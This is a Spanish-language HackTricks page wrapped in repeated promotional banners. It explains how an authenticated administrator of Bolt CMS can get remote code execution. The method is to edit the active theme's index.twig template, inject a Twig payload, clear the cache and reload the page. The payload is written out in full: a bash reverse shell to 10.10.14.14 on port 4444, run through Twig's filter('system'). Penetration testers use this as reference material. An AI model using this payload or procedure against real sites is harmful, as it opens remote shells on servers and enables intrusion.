Bolt CMS

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
Consigue el merchandising oficial de PEASS & HackTricks
Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.

RCE

Después de iniciar sesión como administrador (ve a /bot para acceder al prompt de inicio de sesión), puedes obtener RCE en Bolt CMS:

Selecciona Configuración -> Ver Configuración -> Configuración Principal o ve a la ruta de URL /bolt/file-edit/config?file=/bolt/config.yaml
Verifica el valor del tema

Selecciona Gestión de archivos -> Ver y editar plantillas
Selecciona la base del tema encontrada en el paso anterior (base-2021 en este caso) y selecciona index.twig
En mi caso, esto está en la ruta de URL /bolt/file-edit/themes?file=/base-2021/index.twig
Establece tu payload en este archivo a través de inyección de plantillas (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Y guarda los cambios

Limpia la caché en Mantenimiento -> Limpiar la caché
Accede de nuevo a la página como un usuario regular, y el payload debería ejecutarse

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los PLANES DE SUSCRIPCIÓN!
Consigue el merchandising oficial de PEASS & HackTricks
Descubre La Familia PEASS, nuestra colección de NFTs exclusivos
Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦 @carlospolopm.
Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub de HackTricks y HackTricks Cloud.